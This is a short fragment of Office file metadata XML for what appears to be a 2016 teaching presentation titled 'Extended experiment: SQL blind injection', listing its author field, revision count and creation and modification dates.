      <vt:lpstr>拓展实验——SQL盲注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chang zhao</cp:lastModifiedBy>
  <cp:revision>195</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-16T05:19:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-09T12:22:06Z</dcterms:modified>
</cp:coreProperties>
</file>